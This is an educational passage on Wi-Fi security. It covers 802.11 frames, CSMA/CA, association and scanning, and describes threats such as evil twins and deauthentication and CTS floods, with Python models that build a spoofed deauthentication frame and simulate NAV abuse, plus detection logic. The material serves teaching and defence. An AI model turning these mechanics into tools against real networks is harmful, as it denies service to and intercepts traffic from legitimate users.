Wireless Security

A WLAN (Wireless Local Area Network) connects devices using radio waves, allowing for mobility without physical cables. Key components include Access Points (APs) that manage connections and clients that connect wirelessly. The document also compares WLANs to wired networks, outlines the 802.11 frame structure, and explains the association process between clients and APs, including authentication and configuration parameters.


1. WLAN (Wireless Local Area Network)
A WLAN is a type of local area network that uses radio waves to connect devices
to each other and to a larger network (like the Internet) without the need for
physical cables.
Radio Waves:
WLANs operate using radio waves, which are a form of electromagnetic radiation
that travels through the air. Radio waves are also used for many other
applications like broadcast radio, television, and mobile phone communication.
Main Components of a Wireless Network:
- Access Point (AP): A networking hardware device that allows wireless-capable devices (clients) to connect to a wired network. It acts as the central transmitter and receiver of wireless radio signals, broadcasting the network name (SSID) and managing connections from clients.
- Clients: The end-user devices equipped with wireless network adapters that connect to the WLAN via an Access Point.
2. Wireless vs. Wired Local Networks - Comparison
Physical Layer: WLAN (IEEE 802.11 - Wi-Fi) uses radio frequency (RF) waves; wired Ethernet LAN (IEEE 802.3) uses physical cables.
Media Access Control: WLAN uses CSMA/CA (Collision Avoidance), which listens before transmitting and tries to avoid collisions; wired Ethernet uses CSMA/CD (Collision Detection), which detects collisions and retransmits (less relevant in modern switched, full-duplex networks).
Accessibility/Mobility: WLAN is high, devices can connect anywhere within AP range; wired is low, it requires a physical cable connection to a network port.
Signal Interference: WLAN is susceptible to interference from other RF devices (microwaves, Bluetooth, other Wi-Fi), physical obstructions, etc.; wired has minimal interference, as signals are shielded within cables.
Regulation: WLAN is heavily regulated by country/region regarding frequency bands, power levels, and channel usage; wired Ethernet is primarily governed by IEEE standards for cabling and signaling.
Authorized Frequency Bands & Notes (examples, subject to specific national regulations):
2.4 GHz Band:
- Channels: typically 1-13 (varies slightly by country).
- Max Power: e.g., 100 mW EIRP.
- Often crowded, prone to interference.
5 GHz Band:
- Channels: a wider range of channels available (e.g., 36-64, 100-140, etc.).
- Power: variable, often depending on the channel; subject to DFS (Dynamic Frequency Selection) and TPC (Transmit Power Control) requirements to avoid interference with radar and other systems.
- Generally less crowded than 2.4 GHz, can offer higher speeds.
6 GHz Band (Wi-Fi 6E and newer):
- Authorized more recently (e.g., since 2020-2021 in some regions).
- Offers even more channels and wider channel bandwidths, leading to higher potential speeds and less interference.
- Subject to specific operational restrictions (e.g., Low Power Indoor (LPI) use, Very Low Power (VLP) for portable outdoor devices).
3. 802.11 (Wi-Fi) Frame Structure
802.11 wireless frames have a specific structure to manage communication over the air. Key components include a header, a data payload, and an error checking field.
General Frame Structure:
[ MAC Header ] [ Frame Body (Payload/Useful Data) ] [ FCS (Frame Check Sequence) ]
Key Fields in the 802.11 MAC Header:
Frame Control:
A 2-byte field containing various subfields that define:
- Protocol Version
- Frame Type (Management, Control, Data)
- Frame Subtype (e.g., Beacon, Probe Request, ACK, Data)
- To DS / From DS bits (indicating direction relative to the Distribution System/wired network)
- More Fragments, Retry, Power Management, More Data, Protected Frame (the frame body is encrypted with WEP, TKIP or CCMP/GCMP), and Order bits.
Note that management frames (Beacon, Probe, Authentication, Deauthentication, ...) are sent in the clear and, except for deauthentication, disassociation and some action frames when Protected Management Frames (802.11w) are in use, are not authenticated; this is what makes them easy to spoof.
Duration/ID:
- A 2-byte field used to set the Network Allocation Vector (NAV) for collision avoidance, indicating how long (in microseconds) the medium will remain busy after this frame. In PS-Poll frames it carries the Association ID (AID) instead.
Address Fields (each is a 6-byte MAC address):
- Address 1 (Receiver Address): the station that must receive (and, for unicast, acknowledge) the frame over the air.
- Address 2 (Transmitter Address): the station that transmitted the frame; acknowledgments are sent to this address.
- Address 3 (Destination Address/Source Address/BSSID): meaning varies based on the To/From DS bits:
  - The original source MAC (if From DS=1, To DS=0, i.e., AP to client).
  - The final destination MAC (if From DS=0, To DS=1, i.e., client to AP).
  - The BSSID (AP's MAC address) when both bits are 0 (management frames, ad hoc/IBSS).
- Address 4 (Optional): present only when both To DS and From DS are set, i.e., in Wireless Distribution System (WDS) links between APs or in mesh networks. Not present in typical client-to-AP communication.
Sequence Control:
- A 2-byte field used for tracking fragmented frames and identifying duplicate frames. Contains a 4-bit Fragment Number and a 12-bit Sequence Number.
Frame Body (Useful Data / Payload):
- Contains the actual data being transmitted (an IP packet encapsulated in LLC/SNAP, or the fixed fields and information elements of a management frame). Variable length.
FCS (Frame Check Sequence):
- A 4-byte field containing a CRC-32 value calculated over the MAC header and Frame Body.
- Used by the receiver to detect errors that may have occurred during transmission. If the calculated FCS doesn't match the received FCS, the frame is considered corrupt and discarded (and never acknowledged, so the sender retransmits). The FCS detects transmission errors only; it offers no protection against deliberate modification.
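The following is an added example, not code from the original document: a small Python parser that decodes the Frame Control subfields, labels the address fields according to the To DS/From DS bits as described above, and checks the FCS (CRC-32 over header and body, carried little-endian). The two sample frames, the locally administered MAC addresses and the reason code are constructed for the example.

```python
"""Parse an 802.11 MAC header and verify the FCS of a raw frame (no radiotap header).
Added example, not from the original page; the frames below are constructed."""
import struct
import zlib

FRAME_TYPES = {0: "Management", 1: "Control", 2: "Data", 3: "Extension"}
MGMT_SUBTYPES = {0: "Association Request", 1: "Association Response",
                 4: "Probe Request", 5: "Probe Response", 8: "Beacon",
                 10: "Disassociation", 11: "Authentication",
                 12: "Deauthentication", 13: "Action"}
# Role of Address 1..3 (and 4) as a function of the (To DS, From DS) bits.
ADDR_ROLES = {(0, 0): ("DA", "SA", "BSSID"),
              (1, 0): ("BSSID", "SA", "DA"),
              (0, 1): ("DA", "BSSID", "SA"),
              (1, 1): ("RA", "TA", "DA", "SA")}


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def fcs_ok(frame: bytes) -> bool:
    """FCS = CRC-32 over header + body, sent little-endian as the last four bytes."""
    if len(frame) < 4:
        return False
    received = struct.unpack("<I", frame[-4:])[0]
    return zlib.crc32(frame[:-4]) == received


def build_frame(fc: int, duration: int, addrs, seq: int, body: bytes) -> bytes:
    """Assemble header + body and append a correct FCS. addrs holds 3 or 4 MACs."""
    header = struct.pack("<HH", fc, duration) + b"".join(addrs[:3])
    header += struct.pack("<H", seq << 4)        # fragment 0, sequence number in bits 4..15
    header += b"".join(addrs[3:])                # Address 4 only for WDS/mesh frames
    payload = header + body
    return payload + struct.pack("<I", zlib.crc32(payload))


def parse_frame(frame: bytes) -> dict:
    """Decode the Frame Control subfields and label the addresses by their DS-bit role."""
    if not fcs_ok(frame):
        raise ValueError("FCS mismatch: frame is corrupt and must be discarded")
    fc = struct.unpack_from("<H", frame, 0)[0]
    ftype, subtype, flags = (fc >> 2) & 0x3, (fc >> 4) & 0xF, fc >> 8
    to_ds, from_ds = flags & 0x1, (flags >> 1) & 0x1
    info = {
        "version": fc & 0x3,
        "type": FRAME_TYPES[ftype],
        "subtype": MGMT_SUBTYPES.get(subtype, subtype) if ftype == 0 else subtype,
        "to_ds": bool(to_ds), "from_ds": bool(from_ds),
        "retry": bool(flags & 0x08), "protected": bool(flags & 0x40),
        "duration": struct.unpack_from("<H", frame, 2)[0],
    }
    if ftype == 1:                               # control frames: short header, RA (+TA for RTS etc.)
        info["RA"] = mac_str(frame[4:10])
        if len(frame) >= 20:
            info["TA"] = mac_str(frame[10:16])
        return info
    roles = ADDR_ROLES[(to_ds, from_ds)]
    addrs = [frame[4:10], frame[10:16], frame[16:22]]
    seq_ctl = struct.unpack_from("<H", frame, 22)[0]
    info["fragment"], info["sequence"] = seq_ctl & 0xF, seq_ctl >> 4
    body_start = 24
    if len(roles) == 4:
        addrs.append(frame[24:30])
        body_start = 30
    for role, addr in zip(roles, addrs):
        info[role] = mac_str(addr)
    info["body"] = frame[body_start:-4]
    if ftype == 0 and subtype in (10, 12):       # Disassociation/Deauthentication carry a 2-byte reason code
        info["reason_code"] = struct.unpack("<H", info["body"][:2])[0]
    return info


# Constructed sample frames (locally administered MACs, not real devices).
AP_MAC = bytes.fromhex("02aabbcc0001")
STA_MAC = bytes.fromhex("02ddeeff0002")
DST_MAC = bytes.fromhex("021122334455")
# Deauthentication: subtype 12, type 0 -> first byte 0xC0; no flags; reason code 7.
DEAUTH = build_frame(0x00C0, 314, [STA_MAC, AP_MAC, AP_MAC], 1, struct.pack("<H", 7))
# Data frame from client to AP: type 2 -> first byte 0x08; flag byte 0x01 sets To DS.
# Body is an LLC/SNAP header with the IPv4 EtherType.
DATA_TO_AP = build_frame(0x0108, 44, [AP_MAC, STA_MAC, DST_MAC], 2, bytes.fromhex("aaaa030000000800"))

if __name__ == "__main__":
    for f in (DEAUTH, DATA_TO_AP):
        print(parse_frame(f))
```

Note how little a deauthentication frame contains: two addresses visible in every frame on the channel, a sequence number and a reason code. With a correct FCS any radio can send one, which is why the FCS must not be mistaken for an authenticity check and why the deauthentication attacks discussed later work unless Protected Management Frames are enabled.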

4. CSMA/CA (Carrier Sense Multiple Access with Collision Avoidance)
CSMA/CA is the media access control method used in IEEE 802.11 (Wi-Fi) networks to manage how devices share the wireless medium and to minimize (avoid) data collisions.
Wireless is a shared medium and radios typically operate in half-duplex mode. Unlike wired Ethernet stations, wireless devices cannot reliably detect collisions as they happen, because their own transmission drowns out other signals at their receiver. Therefore, Wi-Fi uses Collision Avoidance rather than Collision Detection.
Core Mechanisms of CSMA/CA:
a) Listen Before Talk (LBT) - Carrier Sense:
Before transmitting, a station listens to the wireless channel to check if it is idle,
this is known as physical carrier sense.
It also uses a virtual carrier sense mechanism called the Network Allocation
Vector (NAV), which is a timer that indicates how long the medium is expected to
be busy based on overheard frame durations.
b) Random Backoff Timer:
If the medium is busy, or after a successful transmission, a station waits a random number of slot times, drawn uniformly from [0, CW], before attempting to transmit. The contention window CW starts at CWmin and doubles after each failed (unacknowledged) attempt, up to CWmax (binary exponential backoff). This reduces the probability that several stations transmit at the exact moment the medium becomes free.
c) Interframe Spacing (IFS):
Defined short time intervals between frames that coordinate access: SIFS (the shortest, used before ACK and CTS so that responses win the medium), DIFS (the time a station must sense the medium idle before a fresh transmission), and EIFS (a longer wait after receiving a frame with a bad FCS).
d) Optional RTS/CTS Exchange (Request to Send / Clear to Send):
For larger data frames, or in busy environments, an RTS/CTS exchange can be
used to reserve the medium:
RTS (Request To Send): The sending station transmits a short RTS frame to the
intended recipient (e.g., Access Point).
CTS (Clear To Send): If the recipient receives the RTS and is ready, it responds
with a short CTS frame.
The RTS and CTS frames contain duration information that updates the NAV for
all other nearby stations, telling them to remain silent for the duration of the
upcoming data transmission and its acknowledgment. This helps to mitigate the
"hidden node problem."
If the sender doesn't receive a CTS, it assumes the medium isn’t available and
will back off.
e) Data Transmission:
Once the medium is clear (or CTS is received), the station transmits its data
frame.
f) Acknowledgments (ACKs):
For most data frames, the receiving station, upon successful reception (FCS
check passes), sends back a short ACK frame to the sender.
If the sender does not receive an ACK within a certain timeframe, it assumes the
data frame was lost and will typically retransmit the frame after a backoff period.
5. Association Between Wireless Client and Access Point (AP)
For a wireless device to communicate on a wireless network, it must first establish a connection with an Access Point (AP) or a wireless router. This process typically involves three main stages:
a) Discovery (Scanning):
The wireless client needs to find available wireless networks. This is done through scanning:
- Passive Scanning: The client listens for "Beacon" frames regularly broadcast by APs. Beacon frames announce the AP's presence and network parameters (like the SSID).
- Active Scanning: The client broadcasts "Probe Request" frames to discover APs. APs within range that receive the probe request respond with "Probe Response" frames.
The client identifies potential APs to connect to based on their SSIDs and signal strength. Because this choice is usually made on SSID and signal strength alone, an attacker's AP advertising the same SSID with a stronger signal can win it (see Evil Twin Attacks below); a client should also require the advertised security mode to match its saved profile.
b) Authentication:
Before a client can associate, it must authenticate with the AP. This is a security step to verify the client's legitimacy (and sometimes the AP's legitimacy to the client).
The type of authentication depends on the security method configured:
Open System Authentication: Essentially no authentication; the client requests, and the AP accepts. Used in open (unsecured) networks, and also as the first step in WPA/WPA2 networks, where the real proof of credentials happens after association (the 4-way handshake for PSK, 802.1X/EAP for Enterprise).
Shared Key Authentication (Legacy - WEP): A deprecated and insecure method where both client and AP use a pre-shared WEP key for a challenge-response authentication. The exchange reveals keystream to an eavesdropper, so it is weaker than Open System with WEP.
802.1X/EAP Authentication (WPA/WPA2/WPA3 Enterprise): A robust authentication framework involving an authentication server (e.g., RADIUS). The client authenticates with the server via the AP after association, before any data traffic is allowed.
PSK Authentication (WPA/WPA2 Personal): The client and AP prove possession of the same Pre-Shared Key (derived from the passphrase) to each other in the 4-way handshake that follows association; the 802.11 authentication frames themselves are Open System.
SAE Authentication (WPA3 Personal): Simultaneous Authentication of Equals runs inside the 802.11 authentication frames and replaces the PSK proof; the 4-way handshake then derives session keys from the SAE result.
c) Association:
Once 802.11 authentication is successful, the client sends an "Association Request" frame to the AP.
If the AP accepts the request, it responds with an "Association Response" frame containing a status code and an Association ID (AID), and the client is then considered associated with the AP.
At this point, the client is part of the Basic Service Set (BSS) managed by that AP and can begin sending and receiving data frames through it (on WPA/WPA2/WPA3 networks, only once the key handshake that follows has completed).
6. Association Between Wireless Client and AP - Key Parameters for Agreement
For a successful wireless association, both the client device and the Access Point must agree on and support a common set of configuration parameters:
SSID (Service Set Identifier): The name of the wireless network. Clients see this name when scanning for available networks (unless SSID broadcast is disabled; note that a hidden SSID is not a security control, since clients reveal it in probe requests and the AP in probe and association responses).
In larger networks, multiple APs can use the same SSID to form an Extended Service Set (ESS), allowing clients to roam. SSIDs are often mapped to specific VLANs in enterprise environments for network segmentation.
Password: A secret key or phrase required for the client to authenticate with the AP. Primarily used in WPA/WPA2/WPA3 Personal (Pre-Shared Key - PSK) security modes.
Network Mode (802.11 Standards): Refers to the specific IEEE 802.11 wireless standards supported (e.g., 802.11a, 802.11b, 802.11g, 802.11n, 802.11ac, 802.11ax - Wi-Fi 6/6E, 802.11be - Wi-Fi 7).
APs often operate in a "mixed mode" to allow clients with different capabilities to connect (e.g., an AP supporting 802.11n/ac/ax can serve both older 802.11n clients and newer 802.11ax clients). Both client and AP must support a common standard.
Security Mode: The type of security protocol used to protect the wireless communication. Examples include:
- WEP (Wired Equivalent Privacy): Deprecated and highly insecure. Do not use.
- WPA (Wi-Fi Protected Access): An interim improvement over WEP. Also largely superseded.
- WPA2 (Wi-Fi Protected Access II): Was the standard for many years, offering strong encryption (AES-CCMP).
- WPA3 (Wi-Fi Protected Access III): The latest standard, offering enhanced security features over WPA2.
Both the client and AP must be configured to use the same (or compatible) security mode and encryption methods. It's recommended to use the highest level of security supported by both devices (ideally WPA3). Transition modes that accept both WPA2 and WPA3 (or both TKIP and CCMP) let an attacker's AP offer only the weaker option, so they should be temporary.
Channel Parameters:
The specific radio frequency channel within a frequency band (e.g., 2.4 GHz, 5 GHz, or 6 GHz) that the AP uses for communication.
The client must tune its radio to the same channel as the AP to communicate.
APs can often automatically select the best channel to minimize interference, or channels can be configured manually.
Standard | Year        | Frequencies (GHz) | Typical Throughput | Max PHY Rate   | Indoor Range                 | Outdoor Range | Wi-Fi Generation
802.11   | 1997        | 2.4               | 1 Mbps             | 2 Mbps         | 20 m                         | 100 m         | -
802.11a  | 1999        | 5                 | 25 Mbps            | 54 Mbps        | 35 m                         | 120 m         | -
802.11b  | 1999        | 2.4               | 6.5 Mbps           | 11 Mbps        | 35 m                         | 140 m         | Wi-Fi 1
802.11g  | 2003        | 2.4               | 25 Mbps            | 54 Mbps        | 38 m                         | 140 m         | Wi-Fi 3
802.11n  | 2009        | 2.4 / 5           | 150-300+ Mbps      | 600 Mbps       | 70 m (2.4 GHz), 35 m (5 GHz) | 250 m         | Wi-Fi 4
802.11ac | 2013        | 5                 | 433-867+ Mbps      | Up to 6.9 Gbps | 35 m                         | 300 m         | Wi-Fi 5
802.11ax | 2019 / 2021 | 2.4 / 5 / 6 (6E)  | Varies widely      | Up to 9.6 Gbps | 35 m                         | 300 m         | Wi-Fi 6 / 6E
802.11be | 2024        | 2.4 / 5 / 6       | Varies widely      | Up to 46 Gbps  | 30 m                         | 120 m         | Wi-Fi 7

Important Considerations:
Data Rates: "Typical" rates are averages and actual throughput is often much
lower than "Max" rates due to overhead, interference, distance, and other
factors. Max rates often assume multiple spatial streams and wide channels.
Range: Theoretical ranges are optimistic and heavily influenced by the
environment, interference, antenna design, and transmit power. Lower
frequencies (like 2.4 GHz) generally offer better range and penetration than
higher frequencies (5 GHz, 6 GHz), but higher frequencies offer more bandwidth
and potentially higher speeds.
Backward Compatibility: Newer standards are generally backward compatible
with older standards operating in the same frequency band (e.g., an 802.11ax AP
can support 802.11n/ac/g/b clients in the 2.4 GHz band).
Wi-Fi Alliance Names: The Wi-Fi Alliance introduced simpler generational names
(Wi-Fi 4, 5, 6, 6E, 7) to make it easier for consumers to identify technology
levels.
Channel Information:
2.4 GHz band:
- Uses channels 1-14 (availability depends on region).
- In the U.S. and many other countries only channels 1-11 are permitted.
- Channel 14 is allowed only in Japan and only for 802.11b.
- Channels are 5 MHz apart but 20 MHz wide, so only channels 1, 6 and 11 do not overlap.
5 GHz Band:
- Uses channels 36-64 and 100-140 (transmit power and DFS requirements vary by channel and country); some regions, e.g., the U.S., additionally allow 149-165.

7. Wi-Fi Discovery Modes: Passive and Active Scanning
Wireless clients use two primary methods to discover available Wi-Fi networks (APs):
a) Passive Scanning (Discovery by Beacons):
Access Points (APs) periodically broadcast Beacon frames (typically about every 100 ms).
Beacon frames contain information about the AP and its network, including:
- SSID (Network Name)
- Supported Wi-Fi standards (e.g., 802.11ax / Wi-Fi 6)
- Security parameters (e.g., WPA3, WPA2), carried in the RSN information element
- Channel information, data rates, etc.
Wireless clients listen passively on different channels for these beacon frames to build a list of available networks.
Advantages:
- Simple and automatic for the client.
- Relatively low power consumption for the client.
- Allows clients to discover all networks that are actively broadcasting their beacons.
b) Active Scanning (Discovery by Probes):
The wireless client actively transmits Probe Request frames to search for networks.
Two main types of Probe Requests:
Directed Probe Request (with known SSID): The client sends a probe request specifying a particular SSID it is looking for. Only APs configured with that exact SSID will respond with a Probe Response frame. Because these probes are sent in the clear, a client that probes for every remembered network leaks its network history to any listener, and an evil twin can answer whatever SSID is requested.
Broadcast Probe Request (general discovery / without SSID): The client sends a probe request with a null or wildcard SSID. All APs in range that are configured to respond to such requests will send back a Probe Response frame, advertising their network(s).
Use Cases for Active Scanning:
- To discover networks where the SSID broadcast has been disabled.
- To potentially speed up the connection process to a known network by directly probing for it.
Probe Response Frames: Similar to Beacons, Probe Responses contain information about the AP and its network, but are unicast to the probing client.
8. Common Threats to WLAN (Wireless Local Area Network)
The broadcast nature of wireless signals makes WLANs inherently more susceptible to certain types of attacks compared to wired networks. Anyone within signal range can potentially attempt to interact with the network using various attacks, including:
Data Interception (Eavesdropping):
- If wireless traffic is not encrypted (or uses weak encryption), attackers within range can capture and read sensitive information transmitted over the air using readily available tools (e.g., packet sniffers). Capturing is entirely passive: a radio in monitor mode transmits nothing, so the network sees no sign that it is happening.
Unauthorized Access (Intruders):
- Weak or non-existent authentication mechanisms (e.g., open networks, easily guessable pre-shared keys/passphrases, no 802.1X authentication) can allow unauthorized users or devices to connect to the WLAN and gain access to network resources.
Denial of Service (DoS) Attacks:
- Attackers can disrupt the availability of the wireless network for legitimate users. This can be achieved through various means:
RF Jamming:
- Transmitting strong radio signals to interfere with legitimate Wi-Fi communication.
Flooding Attacks:
- Overwhelming the Access Point (AP) or clients with excessive traffic or connection requests (e.g., association/authentication floods, deauthentication/disassociation attacks).
Rogue Access Points (Rogue APs):
- An unauthorized AP connected to the organization's wired network, often installed by an employee without IT knowledge/approval or maliciously by an attacker.
- Rogue APs can bypass existing network security controls, create unsecured entry points into the network, and potentially allow attackers to intercept traffic or launch further attacks.
Evil Twin Attacks:
- An attacker sets up a fraudulent AP with the same SSID (and sometimes similar security settings) as a legitimate AP, usually with a stronger signal, and may deauthenticate clients from the legitimate AP so that they reconnect to the twin.
- Unsuspecting users might connect to the evil twin, allowing the attacker to intercept their traffic, steal credentials (e.g., via a fake captive portal), or launch man-in-the-middle attacks.
Misconfigured APs:
- APs configured with weak security settings (e.g., default passwords, disabled encryption, outdated firmware) create significant vulnerabilities.
War Driving/Walking/Chalking:
- The act of searching for Wi-Fi networks, often from a moving vehicle (war driving) or on foot, to identify their existence, signal strength, and security settings. War chalking involves marking locations of open or poorly secured networks.
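The following is an added example, not part of the original document, that ties the discovery and association process (sections 5 and 7) to the evil twin threat above. It models the client side in Python: AP selection from scan results, first the naive "same SSID, strongest signal" rule that an evil twin exploits, then a version that also requires the advertised security mode to match the saved profile; and a client that walks the 802.11 states (1 unauthenticated, 2 authenticated, 3 associated) on management frames, dropping anything out of order. The scan results, MAC addresses, frame contents and status codes are constructed; a real implementation would read them from Beacon, Probe Response and Authentication/Association frames.

```python
"""Client side of discovery and association, and why an evil twin wins a naive client.
Added example, not from the original page; scan results and frames are constructed."""
from dataclasses import dataclass


@dataclass(frozen=True)
class ScanResult:
    """What a client records from a Beacon or Probe Response."""
    ssid: str
    bssid: str
    rssi_dbm: int
    security: str      # as advertised in the RSN element: "open", "WPA2-PSK", "WPA3-SAE", ...
    channel: int


def select_ap_naive(ssid: str, results):
    """Strongest signal among APs with the wanted SSID: the behaviour an evil twin relies on."""
    candidates = [r for r in results if r.ssid == ssid]
    return max(candidates, key=lambda r: r.rssi_dbm, default=None)


def select_ap(profile: dict, results):
    """Same, but the advertised security mode must match the saved profile (no downgrade to open)."""
    candidates = [r for r in results
                  if r.ssid == profile["ssid"] and r.security == profile["security"]]
    return max(candidates, key=lambda r: r.rssi_dbm, default=None)


# 802.11 client states: 1 = unauthenticated/unassociated, 2 = authenticated, 3 = associated
STATE_UNAUTH, STATE_AUTH, STATE_ASSOC = 1, 2, 3
STATUS_SUCCESS = 0


class Client:
    """Walks State 1 -> 2 -> 3 on management frames from the chosen AP; everything else is dropped."""

    def __init__(self, own_mac: str, target: ScanResult):
        self.mac, self.target, self.state, self.aid = own_mac, target, STATE_UNAUTH, None
        self.sent = []          # (subtype, destination, body) frames this client transmitted

    def start(self):
        # Open System authentication, sequence 1. WPA3 would run SAE commit/confirm in these frames.
        self.sent.append(("Authentication", self.target.bssid, {"algorithm": "open", "seq": 1}))

    def receive(self, subtype: str, bssid: str, body: dict) -> str:
        if bssid != self.target.bssid:
            return "ignored: not our AP"
        if subtype == "Authentication":
            if self.state != STATE_UNAUTH or body.get("seq") != 2:
                return "ignored: unexpected authentication frame"
            if body.get("status") != STATUS_SUCCESS:
                return f"authentication failed: status {body.get('status')}"
            self.state = STATE_AUTH
            self.sent.append(("Association Request", bssid,
                              {"ssid": self.target.ssid, "security": self.target.security}))
            return "authenticated"
        if subtype == "Association Response":
            if self.state != STATE_AUTH:
                return "ignored: association response without prior authentication"
            if body.get("status") != STATUS_SUCCESS:
                return f"association failed: status {body.get('status')}"
            self.state, self.aid = STATE_ASSOC, body.get("aid")
            return "associated"
        if subtype == "Deauthentication":          # any state -> State 1
            self.state, self.aid = STATE_UNAUTH, None
            return f"deauthenticated: reason {body.get('reason')}"
        if subtype == "Disassociation":            # State 3 -> State 2 only
            if self.state == STATE_ASSOC:
                self.state, self.aid = STATE_AUTH, None
                return f"disassociated: reason {body.get('reason')}"
            return "ignored: not associated"
        return "ignored: unhandled subtype"


# Constructed scan results: the legitimate AP and an open evil twin with a stronger signal.
LEGIT_AP = ScanResult("CorpWiFi", "02:aa:bb:cc:00:01", -61, "WPA2-PSK", 36)
EVIL_TWIN = ScanResult("CorpWiFi", "02:ee:ee:ee:00:09", -38, "open", 6)
OTHER_AP = ScanResult("Guest", "02:aa:bb:cc:00:02", -50, "open", 11)
SCAN = [LEGIT_AP, EVIL_TWIN, OTHER_AP]
PROFILE = {"ssid": "CorpWiFi", "security": "WPA2-PSK"}


def run_association(client: Client) -> list:
    """Drive one client through a join against its chosen AP and return the transcript."""
    ap = client.target.bssid
    client.start()
    log = [client.receive("Association Response", ap, {"status": 0, "aid": 1})]   # out of order: dropped
    log.append(client.receive("Authentication", ap, {"algorithm": "open", "seq": 2, "status": 0}))
    log.append(client.receive("Association Response", ap, {"status": 0, "aid": 1}))
    return log


if __name__ == "__main__":
    print("naive choice :", select_ap_naive("CorpWiFi", SCAN).bssid)
    print("policy choice:", select_ap(PROFILE, SCAN).bssid)
    c = Client("02:dd:ee:ff:00:02", select_ap(PROFILE, SCAN))
    print(run_association(c), "state", c.state)
```

Two caveats the code makes visible. First, matching the security mode only defeats the open-network downgrade: an evil twin that advertises WPA2-PSK with the same SSID still passes the filter, and what stops it is that it cannot complete the 4-way handshake without the passphrase. Second, the client accepts any Deauthentication frame that carries its AP's BSSID, because without Protected Management Frames it has no way to check who sent it; that is the whole basis of the deauthentication attacks described in the next section.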
9. Wi-Fi Denial of Service (DoS) Attacks and Disruptions
Denial of Service (DoS) in a Wi-Fi context refers to any action that prevents legitimate users from accessing or using the wireless network.
Common Causes of Wi-Fi DoS:
Misconfigured Devices:
- Incorrect settings on Access Points or client devices (accidental or malicious) can lead to network outages or prevent connections. (Examples: channel conflicts, incorrect IP configurations, improper security settings.)
Intentional Hacking (Malicious DoS Attacks):
- RF Jamming: An attacker transmits strong radio signals on Wi-Fi frequencies to overwhelm legitimate signals and disrupt communication. Jamming works below the protocol layer, so no Wi-Fi security setting prevents it; it can only be detected and located.
Protocol-Based Attacks:
- Deauthentication/Disassociation Floods: Sending spoofed management frames to disconnect clients from the AP. The attacker only needs the AP's and the client's MAC addresses, which are visible in every frame on the channel. Protected Management Frames (802.11w), mandatory in WPA3, make the AP and client discard deauthentication and disassociation frames that are not authenticated.
- Association/Authentication Floods: Overwhelming the AP with connection requests from many spoofed source addresses, exhausting its client table.
- CTS/RTS Floods: Abusing the CSMA/CA virtual carrier sense. Every station that hears an RTS or CTS frame sets its NAV to the frame's Duration value, so spoofed frames with large Duration values (up to 32,767 microseconds each) keep the medium reserved and prevent others from transmitting. PMF does not cover control frames, so this remains possible on WPA3 networks.
Accidental Interference:
Non-Wi-Fi devices operating in the same radio frequency bands can interfere with Wi-Fi signals, degrading performance or causing connection drops. Common sources include:
- Microwave ovens (especially in the 2.4 GHz band)
- Cordless phones (older 2.4 GHz models)
- Bluetooth devices
- Other wireless technologies.
The 2.4 GHz band is particularly prone to interference due to its widespread use and fewer non-overlapping channels. The 5 GHz (and 6 GHz) bands are generally less susceptible.
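The following is an added example, not code from the original document, serving both the CSMA/CA mechanics in section 4 and the CTS/RTS flood above. It models in Python what a third-party station does: the binary exponential backoff, the physical plus virtual carrier sense (DIFS and NAV), and the rule that an overheard Duration only ever extends the NAV. Two constructed traces over one second show the effect: a legitimate RTS/CTS exchange every 2 ms reserves the medium 15% of the time, while one spoofed CTS with the maximum Duration every 30 ms reserves it continuously. The slot, SIFS and CW values are the 802.11a/g OFDM ones; the "plausible maximum Duration" used for flagging is an assumed detection threshold, not a value from the standard.

```python
"""CSMA/CA backoff and the NAV (virtual carrier sense) as a third-party station applies them,
and how spoofed RTS/CTS Duration values abuse the NAV. Added example, not from the page;
timings are 802.11a/g OFDM values and the frame traces are constructed (times in microseconds)."""
import random

SLOT_US, SIFS_US = 9, 16
DIFS_US = SIFS_US + 2 * SLOT_US                 # 34 us: idle time required before a new transmission
CW_MIN, CW_MAX = 15, 1023                       # contention window bounds, in slots
NAV_MAX_US = 32767                              # Duration/ID with bit 15 clear: at most 2^15 - 1 us


def contention_window(retry_count: int) -> int:
    """Binary exponential backoff: CW = 2^(4 + retries) - 1, capped at CW_MAX."""
    return min((CW_MIN + 1) * 2 ** retry_count - 1, CW_MAX)


def backoff_us(retry_count: int, rng: random.Random) -> int:
    """Random backoff a station waits after DIFS: uniform in [0, CW] slots."""
    return rng.randint(0, contention_window(retry_count)) * SLOT_US


def sample_backoffs(retry_count: int, n: int, seed: int = 1) -> list:
    rng = random.Random(seed)
    return [backoff_us(retry_count, rng) for _ in range(n)]


class NavTracker:
    """NAV of a station overhearing frames addressed to others."""

    def __init__(self):
        self.busy_until = 0

    def observe(self, now_us: int, duration_us: int) -> None:
        # 802.11: a received Duration only updates the NAV if it extends it.
        self.busy_until = max(self.busy_until, now_us + min(duration_us, NAV_MAX_US))

    def may_transmit(self, now_us: int, idle_since_us: int) -> bool:
        """Physical carrier sense (idle for DIFS) and virtual carrier sense (NAV expired)."""
        return now_us >= self.busy_until and now_us - idle_since_us >= DIFS_US


def nav_busy_fraction(frames, window_us: int) -> float:
    """Share of [0, window_us) during which the NAV reserves the medium.
    frames: iterable of (tx_time_us, duration_us) as overheard by the station."""
    busy, reserved_until = 0, 0
    for tx_time, duration in sorted(frames):
        start = max(tx_time, reserved_until)
        end = min(tx_time + min(duration, NAV_MAX_US), window_us)
        if end > start:
            busy += end - start
            reserved_until = end
    return busy / window_us


def suspicious_durations(frames, max_plausible_us: int = 5484):
    """Frames whose Duration exceeds what a legitimate exchange needs. The default is an
    assumed threshold, roughly the longest single 802.11ac/ax transmission; tune it per site."""
    return [f for f in frames if f[1] > max_plausible_us]


# Constructed traces over one second (1,000,000 us).
# Legitimate: an RTS every 2 ms reserving ~300 us for CTS + data + ACK.
LEGIT_TRACE = [(k * 2000, 300) for k in range(500)]
# Attack: a spoofed CTS with the maximum Duration every 30 ms; each one renews the reservation
# before the previous one expires, so the medium never looks idle to anyone else.
CTS_FLOOD_TRACE = [(k * 30000, NAV_MAX_US) for k in range(34)]

if __name__ == "__main__":
    print("backoffs (retry 0..3):", [sample_backoffs(r, 1, seed=r)[0] for r in range(4)])
    print("legit busy fraction :", nav_busy_fraction(LEGIT_TRACE, 1_000_000))
    print("flood busy fraction :", nav_busy_fraction(CTS_FLOOD_TRACE, 1_000_000))
    print("frames flagged      :", len(suspicious_durations(CTS_FLOOD_TRACE)))
```

Because stations honour any Duration they hear, the attacker spends about 34 short frames per second of air time to block the channel for everyone, which is why wireless IDS products alarm on Duration values far above what the configured data rates can justify.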
Solutions and Mitigation Strategies:
Secure Configurations:
